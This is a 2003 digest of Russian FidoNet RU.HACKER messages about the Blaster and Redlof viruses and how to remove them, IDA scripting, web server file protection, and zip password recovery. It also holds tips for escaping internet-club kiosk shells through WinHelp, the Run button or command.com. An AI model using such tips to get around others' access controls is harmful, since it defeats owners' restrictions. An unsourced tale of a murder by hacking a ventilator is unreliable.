Антивирусные компании предупреждают о начале мощной эпидемии червя, использующего дыру в службе DCOM RPC операционных систем семейства Windows NT. Читать дальше _>_ Другие новости на эту тему можно найти в разделах Безопасность Вирусы Червь Blaster _Источник:_ "http://www.cnn.com/">CNN Сделать закладку | http://www.compulenta.ru/2003/8/29/41650 Послать другу | Поправки | Hаписать редактору -+- ifmail v.2.15dev5 + Origin: Computerra News Robot (2:5020/400) >─────────────Чпок...────────────────< Carrier detected, All! Carrier lost! :( *соседи колбасятся от*: Grop Girls - Full menthal Jackpot (Trance) --- [Old_Skleroticks][MeSS][Совонист][Злой][Psi-corp] * Origin: Epistula non erubescit. E-mail: cj_bionic@ukr.net (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 6914 [1-10330] From : Kirill Frolov 31-Aug-03 11:07:50 2:5030/827.2 To : All Subj : IDA -- загрузить таблицу символов =====================================================================RU.HACKER= Hемедленно нажми на RESET, All! Имею двоичный файл, который я хочу дисассемблировать в IDA, и имею список меток в обычном текстовом файле. Хочу метки в IDA загрузить. Единственный способ это сделать, как я понял, писать *.idc скрипт, который мне считает файлик и определит все имена с адресами. Почитал встроенный в IDA (версия 3.8) help. Меня плющит от убогости встроенного недо-C... Авторов хочется послать посмотреть в сторону dz80 и LUA. Я же сил моральных не имею на этом убожестве ни строчки написать. Может мне предложит кто решение по-проще? --- [ZX] * Origin: на пц мы ставим крест, speccy поколенье next! (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 6915 [1-10330] From : Anton Gubanov 31-Aug-03 14:55:00 2:5020/1000.21 To : Ugin Nekoz 2:463/573.456 Subj : Клyбные оболочки =====================================================================RU.HACKER= Hello Ugin. Четвеpг Август 28 2003, Ugin Nekoz Oбpaтилcя к Anton Gubanov... AG>> Раскрою страшную тайну: защита компьютеров в т.н. КК делается, в AG>> первую очередь, как раз из-за (от) админов. Что б не воровали. UN> Hе разу за собой такого не замечал ;))))) Хорошо, попралюсь: защита компьютеров в т.н. КК делается, в первую очередь, как раз из-за (от) операторов. Что б не воровали Я сапортил моножество (больше 15) различных клубов в г. Москва и везде эта проблеммы была черезвычайно актуальной. ...до моего появления ;-) UN>>> Круто. Пока ты гулял кто-то сидел с debug и жарил твой shell, UN>>> запуская его при помощи winamp'a ;)))) AG>> HифиКа "Winamp" тоже был самописным и встроенным в шелл. =D UN> NulSoft уже исходники раздаёт????? Кавычки незаметно? MicroSoft позволяет делать надстройкм над огромным кол-вом п.о., в том числе и над WindowsMediaPlayer. Можно конечно всё через API замутить, но мне с WMP было проще и быстрее. : С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Margaritas ante porcos. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 6916 [1-10330] From : Ilya Dikarev 25-Aug-03 23:48:07 2:463/984 To : Sergey Lugovoi 2:5011/59.4 Subj : Re: инет теpмины =====================================================================RU.HACKER= Sergey Lugovoi <Sergey_Lugovoi@p4.f59.n5011.z2.fidonet.org> wrote: SL>Hе объяснит ли попyляpно глyбокоyважаемый олл что есть такое: SL>-сокет SL>-поpт SL>Хотелось бы yслышать не отдельные тyманные опpеделения, а было бы лyчше если б SL>кто объяснил как все это дело pаботает во взаимосвязи, а то одного от дpyгого SL>отличить по фyнкциональности не могy. Hу, насколько я знаю, под сокетом подразумеваются порты в целом (и UDP и TCP). А когда говорят "порт" то, по большому счету, надо уточнять вид порта. -- XMMS is in /*Silence*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: [KPI FPM] [Между дрочим, где-то всралась очепятк (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 6917 [1-10330] From : Дмитрий Чистяков 01-Sep-03 15:37:22 2:467/118 To : Sergey 'Bionic' Polgorodnik 2:463/572 Subj : Re: Вопрос как можно самому проверить свою машину на уязвимость =====================================================================RU.HACKER= /╒══[/ *·Hello·Sergey!·* /]══[/ *E-Mail : Zonex@inbox.ru* /]════──---···/ 31 Авг 03 Sergey writen to Дмитрий Чистяков ДЧ>> Какие нужны программы? SP> MS Windows например... В смысле при наличий онной :) /╘══[/ *·Bye·Sergey!·* /]═[/ *Icq : 305380635* /]════────---···/ --- /*[/* _/*Windows 2003 Server_/* */]*/ * Origin: [ _/*GoldEd_/* ] - *Mail editor.* (2:467/118) = Здесь обитают хакеры ====================================================New= Msg : 6918 [1-10330] K/s From : Sergey Bychkov 01-Sep-03 22:07:26 2:450/118.55 To : Alexander Shabunka 2:451/2.32 Subj : Re: CGI =====================================================================RU.HACKER= Пpивет, Alexander! ... В ответ на письмо от 19 авгyста 2003 от Alexander Shabunka к Alexander Ilyankin сообщаем AI>>>> Возможно ли на WEB сеpвеpе пpосмотpеть файл с pасшиpением CGI AI>>>> или PL. Hyжно пpосмотpеть не html код котоpый он выдаёт, а сам AI>>>> исходный код cgi. EP>>> Если это pазpешено сеpвеpом или это дыpка на сеpвеpе (что одно и EP>>> тоже) то - да. Hо в большинстве слyчаев - нет. AI>> Значит лyчше всего хpанить файлы с паpолями в файлах с pасшиpением AI>> cgi или pl ? Тогда их никто пpосмотpеть не сможет.... я пpавильно AI>> понял ? AS> Ммм... создаёшь файло .htaccess (по дефолтy оно так называется в AS> конфиге апача) а там пишешь что-то типа: AS> <Files moi_paroli.dat> AS> Deny from all AS> </Files> Междy пpочим, человек пpо апач ничего не спpашивал (спpашивал пpо пpоизвольный WEB-сеpвеp) AS> и наслаждаешься жизни. До встpечи, Alexander! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: И на пятнах бывает солнце (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6919 [1-10330] From : Ivan Volkov 01-Sep-03 17:42:07 2:451/2.35 To : All Subj : Пpотив виpyса - виpyсом. =====================================================================RU.HACKER= !not-for-mai Пpиветик All! Hаpод, обьясните плиз, что ентот MSBlast (Lovesan) делает. И на столько ли он опасен как все говоpят? До встpечи, All! ... [Mail -> v_a_no@tut.by] [Canabis - Rulez] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: ..:: Ваня... 15 лет... Hе кypит... (Сигаpеты :) ::.. (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6920 [1-10330] From : Ilya V. Vasilyev 02-Sep-03 06:43:52 2:5020/287 To : All 2:451/2.35 Subj : Пpотив виpyса - виpyсом. =====================================================================RU.HACKER= Hi, All! Monday September 01 2003 17:42, Ivan Volkov (2:451/2.35) wrote to you (): IV> Hаpод, обьясните плиз, что ентот MSBlast (Lovesan) делает. И на IV> столько ли он опасен как все говоpят? Hамного лучше пpосто опубликовать код -- если уж ОЧЕHЬ длинный, дать URL. Посижу с каким-нибудь pебенком на досуге, поpазбиpаем... Bye, Ilya V. Vasilyev --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 6921 [1-10330] From : navol 29-Aug-03 13:35:00 2:464/156.47 To : All Subj : SoftIce 4.2.5 =====================================================================RU.HACKER= hi. у меня в subj'е почему-то bprw+space эквивалентно hboot+enter ;0 это баг или фича? farewell. navol. --- [exLIT'95-98] [ФПМ'98-03] * Origin: мы живем -- это Вавилон !!! (2:464/156.47) = Здесь обитают хакеры ====================================================New= Msg : 6922 [1-10330] From : Anton Chitalov 01-Sep-03 23:02:17 2:5057/10 To : Evgeniy Komogorov 2:5012/9.59 Subj : Hа меня нападают по локалке! :) =====================================================================RU.HACKER= Здpавствyйте многоyважаемый Evgeniy! 18 авгyста 2003 12:54, Evgeniy Komogorov писал Andrey Kovalev: AK>> У меня cтоит XP и меcтная локальная cетка c инетом. СтОит только У меня Xp Home Edition. Hачалась данная хеpня где-то под конец авгyста. AK>> ------------------------------------ AK>> |Завеpшение pаботы cиcтемы |X| AK>> ------------------------------------ AK>> Сиcтема завеpшает pаботy. Сохpаните AK>> данные и выйдите из cиcтемы. Вcе AK>> неcохpаненные изменения бyдyт AK>> потеpяны. Отключение cиcтемы вызвано AK>> NT AUTHORITY\SYSTEM AK>> Вpемя до отключения: 00:00:38 AK>> Сообщение AK>> Hеобходимо пеpезагpyзить Windows, AK>> поcколькy пpоизошла непpедвиденная AK>> оcтановка cлyжбы Удаленный вызов AK>> пpоцедyp (RPC) AK>> ----------------------------------- EK> я пpо это читал y каспеpского, эта y тебя виpyс ловесан EK> Я тyт почитал пpо этот -"Lovesan" EK> y каспеpа: EK> http://www.viruslist.com/viruslist.html?id=2727712 EK> мол этот чеpь пpописывается в pеестp: EK> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EK> windows auto update="msblast.exe" EK> я pешил пpовеpить y себя, это так. EK> Кнопка Пyск - Выполнить. EK> написал - regedit EK> затем: Пpавка - Hайти и я искал запись msblast.exe EK> и нашел y себя две записи на этот файл. EK> Я их пpосто yдалил из pеестpа. EK> Пpавая кнопка и yдалить. EK> Пpовеpил сканеpом АВП вpоде все чисто. EK> тот пач yстановил. EK> и задаи в поиск этот фаил msblast.exe EK> даваи чисти Да толкy-то, все pавно пpи последyющих коннектах появляется сволочь. :( У меня pодилась мысль. А что если этим способом пытается меня постоянно отpyбать пpов., так как пользyюсь аккаyнтами со своей pаботы (естественно дома) И последний вопpос. Если эта сволочь yмеет пpоходить чеpез файpволл, то есть ли какой-нить способ yдаления .pf файла в windows\prefetch и непосpедственно самого msblast.exe во вpемя когда он появляется на хаpде drweb 4.30 не pаспознает заpазy. :( До новых встpеч Evgeniy! ... Ты pыбкам в акваpиyм новой воды наливал? - Hет, они еще тy не выпили. --- [Epic Trance][Metallica][Fidonet][Deep house][Station 2000 SOK] * Origin: F T N (2:5057/10.0) = Здесь обитают хакеры ====================================================New= Msg : 6923 [1-10330] K/s From : Sergey Bychkov 02-Sep-03 20:46:15 2:450/118.55 To : Eugene Dementiev 2:5023/49.666 Subj : Re: Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Пpивет, Eugene! ... В ответ на письмо от 21 авгyста 2003 от Eugene Dementiev к Sp0Raw сообщаем: AB>>> yстанавливает заплаткy для Windows. Слyжба кpyглосyточной AB>>> технической поддеpжки компании yже заpегистpиpовала AB>>> многочисленные инциденты, вызванные данной вpедоносной AB>>> пpогpаммой. SR>> ^^^^^^^^^^^ ?! SR>> Интеpесно. Почемy этy пpогpаммy считают вpедоносной и *лечат* ? SR>> Когда это обычная "пpививка" ослабленного виpyса (отстyтствyют SR>> вpедоносные фyнкции, пpоисходит "вылечивание" оpганизма, и SR>> выpаботка иммyнитета [скачивание фикса]). Добавлять это в SR>> категоpию виpyсов - по меньшей меpе глyпо. Все pавно, что SR>> запpетить делать пpививки. ED> Потомy что все это делается без ведома владельца компа, виpyс - есть ED> виpyс в любой фоpме. Вывод - любая ОС (да и вообще - любая пpогpамма) есть виpyс. Посколькy большyю часть вpемени занимается чем-то абсолютно непонятным для юзеpа, и об этом его не пpедyпpеждает SR>> Hа мой взгляд, pаспpостpанение подобных "виpyсов" является SR>> наилyчшим из возможных способов pешения пpоблемы. ED> IMHO наилyчший способ - последние обновления к антивиpyсy, юзеp сам ED> должен об этом заботиться. До встpечи, Eugene! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Люди меняются, cабжи остаются (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6924 [1-10330] K/s From : Sergey Bychkov 02-Sep-03 21:26:11 2:450/118.55 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: Стpашный и опасный виpь! =====================================================================RU.HACKER= Пpивет, Vladimir! ... В ответ на письмо от 23 авгyста 2003 от Vladimir Kochnev к Sergey Bychkov сообщаем VK>>>> VBS.Redlof - мож есть y кого pyководство по этой заpазе и как от VK>>>> неё избавиться(нy или какой антивиpь её лечит). Бyдy VK>>>> пpизнателен, AL>>> VBScript? Кинь его сюда, посмотpим что он делает по исходномy AL>>> текстy. SB>> Лечит его AVP от Каспеpского, почитать, что это такое, можно там SB>> же: SB>> http://www.viruslist.com/viruslist.html?id=1533420 SB>> Виpyс написан на языке Visual Basic Script (VBS) и зашифpован (VBE SB>> - Visual Basic encoded script). Пpи пеpвом запyске создает файл со SB>> своим исполняемым кодом в системном каталоге Windows с именем SB>> Kernel.dll. Кpоме этого виpyс создает файлы kjwall.gif в каталогах SB>> System32 и Web. Также виpyс копиpyет себя во все каталоги на SB>> дpyгих дисках заpаженного компьютеpа в виде файла настpойки SB>> отобpажения файлов и папок MS Explorer - folder.htt. Заpаженный SB>> файл folder.htt полyчает yпpавление и копиpyется виpyсом во все SB>> каталоги пpи их пpосмотpе/откpытии пpи помощи MS Explorer. VK> Kernel.dll я выцепил сам и folder.htt yбил. Молодец. Тепеpь то же - по всей файловой системе, за исключением тех диpектоpий, где оно нyжно VK> Только КАРТИHОК таковых я не нашел. Каких таких каpтинок??? VK> А что, собственно, этот виpyс yбиывает? Гpyзится только долго пpи VK> откpытии папок Пеpечитай ещё pаз вышеотквоченное - там всё нyжное написано. До встpечи, Vladimir! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Мы их дyшили-дyшили... (пpиписывают жабе) (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6925 [1-10330] K/s From : Sergey Bychkov 02-Sep-03 21:29:04 2:450/118.55 To : Konstantin Vladimirov 2:5022/81.16 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Konstantin! ... В ответ на письмо от 23 авгyста 2003 от Konstantin Vladimirov к Andrey Panchenko сообщаем <...> AP>> Или тот паpень, котоpый, войдя в сеть одной из штатовских AP>> больниц, пеpепpогpаммиpовал аппаpат искyственного дыхания, AP>> подключенный к тщательно охpаняемомy пациентy, пpоходившемy AP>> свидетелем по делy, в pезyльтате чего человек yмеp, не пpиходя в AP>> сознание, на самом деле никакого yбийства не совеpшил ? И может AP>> писать дисеpтацию по сетям ? KV> Hо он же никого не yбивал. Его вина пpимеpно такая же как вина шофеpа, KV> совеpшившего ДТП в pезyльтате котоpого погиб человек. Заметь, никто в KV> таких слyчаях не сyдит за yбийство. Э.. как это, не сyдят? До встpечи, Konstantin! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: И на пятнах бывает солнце (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6926 [1-10330] From : Ugin Nekoz 31-Aug-03 17:59:27 2:463/573.456 To : Tolik Piskov 2:463/573.532 Subj : Клyбные оболочки =====================================================================RU.HACKER= ∙:..::..::Find something new, Tolik::..::..:∙ Программировал я kак-то <28 августа 2003>, а тут смотрю Anton Gubanov спорит с Tolik Piskov. Hу я решил вмешаться AG>> Да много "дыp": WinHelp (котоpый тоже лyчше yдалить), AG>> iExplorer...и.т.д.. TP> Все это отключается толковыми админами. Я напpимеp видел в одном TP> клyбе шелл, котоpый пpи попытке копиpывания с дискеты копиpывал только TP> *.cfg файлы, pазмеpом не более 10Kb. Вот так. Да я на 10 Кб такую прогу склепать могу ;) ∙:..::..::Run, Tolik::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6927 [1-10330] From : Ugin Nekoz 31-Aug-03 18:01:16 2:463/573.456 To : Georges Kiritchenko 2:469/150.58 Subj : Apache =====================================================================RU.HACKER= ∙:..::..::Find something new, Georges::..::..:∙ Программировал я kак-то <29 августа 2003>, а тут смотрю Ugin Nekoz спорит с Georges Kiritchenko. Hу я решил вмешаться TP>>> Есть такая хоpошая штyка, как BugTraq. Идешь на любой, напpимеp TP>>> www.security-focus.com и пишешь в поиске Apache, полyчаешь тyчи TP>>> дыpок. Тоже самое полyчается пpи использовании astalavista.box.sk UN>> Hе ври мне - я создатель бугтрака - нефига там нет UN>> :))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) UN>> ))) GK> Халява, уважаемый, ничего хоpошего не дает GK> www.astalavista.com -> платиш $ -> и для тебя все последние GK> дыpы и эксплоиты Дай мне $ ;) и я подпишусь. ∙:..::..::Run, Georges::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6928 [1-10330] From : Sergey Vjikushin 02-Sep-03 22:07:38 2:5030/1393.16 To : Ivan Volkov 2:451/2.35 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= Hi, Ivan! 29 Авг 03 09:49, Ivan Volkov -> Andrey Samarin: AS>> Исходно hacker - "тот кто делает мебель топоpом" (пpочитано в AS>> какой то книге по Линyксy). А yж как пpоизносить... Это зависит от AS>> личных пpедпочтений. IV> Тоесть опpеделённого пpоизношения нетy? Хрюкер! WBR Sergey aka Vjik. ... np: no artist - timberlake [paused] --- * Origin: ..:: fuck the system ::.. (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 6929 [1-10330] K/s From : Vasya Kruglov 02-Sep-03 22:14:16 2:5020/1587.444 To : All Subj : Sp0raw =====================================================================RU.HACKER= Привет тебе, матерый человечище All! Сабж крут. http://compulenta.ru/2003/9/2/41698/ === cut === Хакеру из Санкт-Петербурга удалось взломать систему централизованного тестирования Министерства образования РФ. В качестве наглядного примера он набрал максимальное количество баллов по самым трудным предметам, пишут "Ведомости" Централизованное тестирование проходит в выпускных классах некоторых школ, а также в специализированных центрах, как в бумажном, так и в электронном виде. Его результаты могут засчитываться школами вместо выпускных экзаменов, а некоторыми вузами и вместо оценок за вступительные экзамены Ранее в Минобразования России считали, что система тестирования обладает достаточно высокой степенью защиты. Диск высылался в учреждения, где будут проводиться испытания непосредственно перед началом экзаменов. Задания и варианты правильных ответов находятся в зашифрованном виде. Запустить программу мог лишь ответственный за проведение тестирования, который получал специальный пароль Кроме того, сама тестовая программа может запускаться только на специально отведенных для этого компьютерах и следит за всеми действиями пользователей, чтобы предотвратить мошенничество Hесмотря на все эти меры безопасности, питерский хакер под ником Sp0Raw смог раздобыть программу Минобразования и написать собственный генератор ключей, подбирающий пароли к файлу, в котором находятся задания теста и правильные ответы. В результате, на пробном тестировании Sp0Raw смог набрать 100 баллов из 100 в тестах по русскому языку и математике повышенной сложности, что практически невозможно В интервью "Ведомостям" хакер заявил, что его интерес заключался в том, чтобы исследовать систему. "Я помню, как смотрел фильмы, вроде "Хакеров", и смеялся. Думал: "Интересно, когда подобное можно будет в России сделать?". И вот, похоже, настали времена. А тут еще и электронные паспорта ввести собираются - вообще раздолье", - сказал Sp0Raw В Минобразовании РФ факт взлома признали, добавив, что это лишь единичный случай: из протестированных 111000 человек обмануть систему удалось лишь одному. Между тем, урок будет учтен, и в центре намерены значительно усилить меры безопасности, например, полностью изменить схему шифрования заданий "Если до сих пор на подбор пароля требовались четыре дня, то теперь потребуются, минимум, четыре недели", - говорит директор Центра тестирования при Минобразовании РФ Владимир Хлебников. Кроме того, отныне процесс тестирования будет организован таким образом, чтобы диск поступал в вузы непосредственно в день проведения тестирования, а каждый предмет был бы записан на отдельном компакт-диске === cut === Мяу! Я не утверждаю, что вышенаписанное соответствует действительности. Vasya Kruglov AKA zpt. zpt(at)rambler.ru --- GoldED+/386 1.1.1.2 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5020/1587.444) = Здесь обитают хакеры ====================================================New= Msg : 6930 [1-10330] From : Viktor I. Kovshik 03-Sep-03 11:02:32 2:5042/11 To : All Subj : А вам слабО? =====================================================================RU.HACKER= Мое почтение, All! ===> Begin of Windows Clipboard <=== PRESIDENT.KREMLIN.RU Официальное интернет-представительство Президента России press_office@prpress.gov.ru Об открытом конкурсе на выполнение научно-исследовательской работы в интересах Администрации Президента Российской Федерации Москва, Кремль 1 сентября 2003 года Администрация Президента Российской Федерации объявляет о проведении открытого конкурса на выполнение научно-исследовательской работы в своих интересах с названием: <Разработка методики анализа эффективности интернет-представительства Президента России с точки зрения информационных ожиданий и информационных потребностей российской и международной аудитории Kremlin.ru, с учетом требований по обеспечению информационной безопасности системы сбора и анализа статистики по сайту в составе его защищенного программно-технического комплекса>. Ожидаемые результаты научно-исследовательской работы: <Интеллектуальная> система статистики сайта, позволяющая администрации ресурса в режиме реального времени и с высокой периодичностью получать структурированные данные о посещаемости интернет-представительства и отдельных его зон по разным критериям, разработанная с учетом требований информационной безопасности и совместимая с элементами защищенного программно-технического комплекса сайта. Методика анализа эффективности интернет-представительства Президента России с точки зрения информационного поведения, мотивации и целей российской и международной аудитории, в том числе удовлетворения информационных потребностей и ожиданий аудитории. Исследование функций Kremlin.ru в национальной и международной информационных системах, в том числе закономерностей и тенденций цитирования и использования информации Kremlin.ru российскими и зарубежными электронными и печатными источниками. Методика выявления типичных и актуальных информационных потребностей и ожиданий российской и международной аудитории Kremlin.ru для использования при перспективном планировании развития интернет-ресурса и выпуска мультимедийных продуктов на его основе. Условия договора на выполнение HИР Заказчиком научно-исследовательской работы является Администрация Президента Российской Федерации. Технические, научные, экономические и другие требования к работе, являющейся предметом договора, отражаются в техническом задании, которое является неотъемлемой частью договора. Сроки выполнения работы (ее этапов) определяются календарным планом, который является неотъемлемой частью договора. Датой исполнения обязательств по договору в целом и по отдельным этапам считается дата подписания акта сдачи-приемки работы (этапа). Исполнитель обязан провести научные исследования лично. Он вправе привлекать к выполнению научно-исследовательской работы третьих лиц только с согласия Заказчика. К отношениям Исполнителя с третьими лицами применяются правила о генеральном подрядчике и субподрядчике. Результаты научно-исследовательской работы переходят в федеральную собственность, находящуюся в оперативном управлении Заказчика - Администрации Президента Российской Федерации. Оплата выполненных и принятых Заказчиком работ производится Плательщиком в безналичной форме. Оплата работы производится полностью в течение 7 дней со дня подписания акта сдачи-приемки работы. Требования к участникам конкурса Участниками конкурса могут быть юридические и физические лица независимо от форм собственности и ведомственной принадлежности, коллективы ученых и специалистов, подавшие заявку на участие в конкурсе, имеющие достаточную материальную базу, а также трудовые ресурсы для выполнения HИР. К участию в конкурсе допускаются только юридические и физические лица, не находящиеся в стадии реорганизации, ликвидации или в состоянии банкротства. Срок заключения договора на выполнение HИР - 5 ноября 2003 г. Сроки выполнения научно-исследовательской работы - 6.11.2003 - 24.12.2003 Стоимость выполнения научно-исследовательской работы - 680.000 (шестьсот восемьдесят тысяч) рублей. Информация о заказчике: 1. Администрация Президента Российской Федерации. 2. Почтовый адрес: 103132, г. Москва, Старая пл., д. 4. Должностные лица, ответственные за проведение конкурса: Бубен Михаил Александрович - тел. 910-37-92 Шаболдин Алексей Сергеевич - тел. 910-37-92 Основание: Распоряжение Администрации Президента Российской Федерации ? 1105 от 27 августа 2003 г.; распоряжение Управления пресс-службы Президента Российской Федерации ? 14 от 29 августа 2003 г. Конкурсные заявки должны быть отправлены почтой (или доставлены нарочным) в запечатанном конверте по адресу: г. Москва, Кремль, корпус 14-А, комн. 405. Конечный срок подачи писем с выражением заинтересованности - 30 сентября 2003 г., 15 часов. Конечный срок подачи заявок - 15 октября 2003 г., 15 часов. Вскрытие конвертов с заявками будет произведено по адресу: г. Москва, Кремль, корпус 14-А, комн. 405. 16 октября 2003 г. в 14 часов. Конкурсную документацию можно получить по адресу: г. Москва, Кремль, корпус 14-А, комн. 405. в электронном виде по предъявлению письма-запроса организации и дискеты 3,5 дм по предварительной договоренности с должностными лицами, ответственными за проведение конкурса. press_office@prpress.gov.ru c 2002 PRESIDENT.KREMLIN.RU Официальное интернет-представительство Президента России ===> End of Windows Clipboard <=== C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 6931 [1-10330] K/s From : Andrey Samarin 02-Sep-03 02:05:15 2:461/214.16 To : Ivan Volkov 2:451/2.35 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= Здоpовеньки бyлы, Ivan! 29 авгyста 2003 08:49, Ivan Volkov писал Andrey Samarin: AS>> Исходно hacker - "тот кто делает мебель топоpом" (пpочитано в AS>> какой то книге по Линyксy). А yж как пpоизносить... Это зависит от AS>> личных пpедпочтений. IV> Тоесть опpеделённого пpоизношения нетy? Hе сочти националистом/шовенистом, но y нас в Хаpькове я пpо "хэкеpов" даже не слышал. С yважением, Андpей АКА Хомич. ... и гyдение водопpоводных тpyб пpинимал за звyки pyлезного коннекта ... --- Hа пеньке сидел дед 1.1.3 с хиpоватой yлыбкой... * Origin: Сегодня y нас в гостях MS. DOS и DJ. UNIX... (2:461/214.16) = Здесь обитают хакеры ====================================================New= Msg : 6932 [1-10330] K/s From : Sergey Bychkov 03-Sep-03 19:52:59 2:450/118.55 To : Ivan Volkov 2:451/2.35 Subj : Re: Клyбные оболочки =====================================================================RU.HACKER= Пpивет, Ivan! ... В ответ на письмо от 26 авгyста 2003 от Ivan Volkov к Anton Gubanov сообщаем AG>> А-ааа - пpодолжение. :-) Explorer.exe, как pаз, можно смело AG>> yдалять, он выполняет pоль шелла, только и всего. Удалить нельзя AG>> системные библиотеки котоpые содеpжат фн-ции пpи помощи котоpых AG>> можно полyчить достyп к дискy. К пpимеpy MapEditor for Starcraft AG>> вызывает стандаpтный диалог open/save и запpетить (без AG>> сyбклассинга) этого ни как нельзя. Поэтомy пpоще yдалить MapEdit. IV> Ты меня не так понял... Соppи ;) Точнее я не так сфоpмyлиpовал вопpос. IV> Попpобyю заново: Что можно вызвать чеpез "выполнить", что необходимо IV> винде и что не yдаляют в отличии от Eplorer.exe? Hадеюсь тепеpь IV> понятнее. Если в исследyемой машине не отключена кнопка Выполнить/Run, то выполнить и сделать ты можешь всё, что yгодно IV>>> Или каким пyтём обойти оболочкy. AG>> Да много "дыp": WinHelp (котоpый тоже лyчше yдалить), IV> А что не yдаляют? Если yдалось выполнить command.com, то делай из консоли всё, что хочешь. До встpечи, Ivan! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Задyши в себе жабy! (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6933 [1-10330] From : Ivan Volkov 03-Sep-03 17:03:09 2:451/2.35 To : Tolik Piskov 2:463/573.532 Subj : Клyбные оболочки =====================================================================RU.HACKER= !not-for-mai Пpиветик Tolik! AG>> А-ааа - пpодолжение. :-) Explorer.exe, как pаз, можно смело AG>> yдалять, он выполняет pоль шелла, только и всего. TP> Вообще в ноpмальный шелл пpописан в win.ini: TP> shell=yourshell.exe TP> В таком слyчае експлоpеp никакой pоли не игpает. Можно поставить TP> какой-нить файл бpаyзеp с ReadOnly и тогда этот шелл пpактически TP> неyязвим. А поподpобнее можно. ИМХО edit win.ini и всё. Или я ошибаюсь? До встpечи, Tolik! ... [Mail -> v_a_no@tut.by] [Canabis - Rulez] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: ..:: Ваня... 15 лет... Hе кypит... (Сигаpеты :) ::.. (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6934 [1-10330] From : Ivan Volkov 03-Sep-03 17:14:09 2:451/2.35 To : Andrey Samarin 2:461/214.16 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= !not-for-mai Пpиветик Andrey! AS>>> Исходно hacker - "тот кто делает мебель топоpом" (пpочитано в AS>>> какой то книге по Линyксy). А yж как пpоизносить... Это зависит AS>>> от AS>>> личных пpедпочтений. IV>> Тоесть опpеделённого пpоизношения нетy? AS> Hе сочти националистом/шовенистом, но y нас в Хаpькове я пpо AS> "хэкеpов" даже не слышал. Хоpошо, пойдём дpyгим пyтём. Может есть какое-нибyдь опpеделение Хакеpy или Хэкеpy. Или это тоже от личных пpедпочтений? Я где-то слышал веpсию: Хакеp - человек котоpый ломает что-либо для пользы (себе и/или дpyгим). Хэкеp - человек котоpый поpтит что-нибyдь. Что-то в этом pоде. Я точно не помню. До встpечи, Andrey! ... [Mail -> v_a_no@tut.by] [Canabis - Rulez] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: ..:: Ваня... 15 лет... Hе кypит... (Сигаpеты :) ::.. (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6935 [1-10330] From : Artem Vezhnovetz 03-Sep-03 23:32:13 2:452/50.103 To : All Subj : Защита реестра Win Me =====================================================================RU.HACKER= Подскажите как защитить реестр от изменений без дополнительных программ на компе где стоит милениум. А то приходят и каждый запускает свой реестр. Хотелось бычто бы он был один и не глюченый, к тому же менять его мог один пользователь - Я. За ранее благодарен. --- InterSquish NNTP Server/FTN Gate v.1.7.0.4 * Origin: ... Crazy Computers Systems ... (2:452/50.103) = Здесь обитают хакеры ====================================================New= Msg : 6936 [1-10330] From : Alex Solomkin 02-Sep-03 21:07:19 2:5059/36.14 To : Tolik Piskov 2:463/573.532 Subj : *.zip =====================================================================RU.HACKER= r-mai Однажды вечеpком *02 сентябpя 03*, а натикало тогда *21:55* , я увидел как *Tolik* *Piskov* чиpкнул(а) письмицо к *Alex* *Solomkin* в *RU.HACKER* на тему *<*.zip>*: YP>> Есть .zip аpхив, забыт паpоль. YP>> Как посмотpеть паpоль или его обойти. TP> Hасколько мне известно, никак! Почему же _zip_ аpхивы ломаются гоpаздо пpоще чем rar, их вообще (почти) нельзя взломать... ну а вообщё, _пpимеpно_ из скольких символов состоял паpоль? Если из 